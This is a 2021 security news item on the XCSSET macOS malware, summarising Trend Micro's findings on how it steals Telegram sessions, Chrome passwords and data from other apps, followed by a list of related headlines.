Security News > 2021 > July > Nasty macOS Malware XCSSET Now Targets Google Chrome, Telegram Software
A malware known for targeting macOS operating system has been updated once again to add more features to its toolset that allows it to amass and exfiltrate sensitive data stored in a variety of apps, including apps such as Google Chrome and Telegram, as part of further "Refinements in its tactics."
Earlier this April, XCSSET received an upgrade that enabled the malware authors to target macOS 11 Big Sur as well as Macs running on M1 chipset by circumventing new security policies instituted by Apple in the latest operating system.
"The malware downloads its own open tool from its C2 server that comes pre-signed with an ad-hoc signature, whereas if it were on macOS versions 10.15 and lower, it would still use the system's built-in open command to run the apps," Trend Micro researchers previously noted.
Now according to a new write-up published the cybersecurity firm on Thursday, it has been discovered that XCSSET runs a malicious AppleScript file to compress the folder containing Telegram data into a ZIP archive file, before uploading it to a remote server under their control, thus enabling the threat actor to log in using the victim accounts.
With Google Chrome, the malware attempts to steal passwords stored in the web browser - which are in turn encrypted using a master password called "Safe storage key" - by tricking the user into granting root privileges via a fraudulent dialog box, abusing the elevated permissions to run an unauthorized shell command to retrieve the master key from the iCloud Keychain, following which the contents are decrypted and transmitted to the server.
Aside from Chrome and Telegram, XCSSET also has the capacity to plunder valuable information from a variety of apps like Evernote, Opera, Skype, WeChat, and Apple's own Contacts and Notes apps by retrieving said data from their respective sandbox directories.
News URL
Related news
- Lazarus hackers used fake DeFi game to exploit Google Chrome zero-day (source)
- How to enable Safe Browsing in Google Chrome on Android (source)
- Lazarus Group Exploits Google Chrome Vulnerability to Control Infected Devices (source)
- New tool bypasses Google Chrome’s new cookie encryption system (source)
- Fake Google Meet conference errors push infostealing malware (source)
- macOS HM Surf vuln might already be under exploit by major malware family (source)
- Google to let businesses create curated Chrome Web Stores for extensions (source)
- Russian Espionage Group Targets Ukrainian Military with Malware via Telegram (source)
- North Korean Hackers Target Crypto Firms with Hidden Risk Malware on macOS (source)
- North Korean hackers use new macOS malware against crypto firms (source)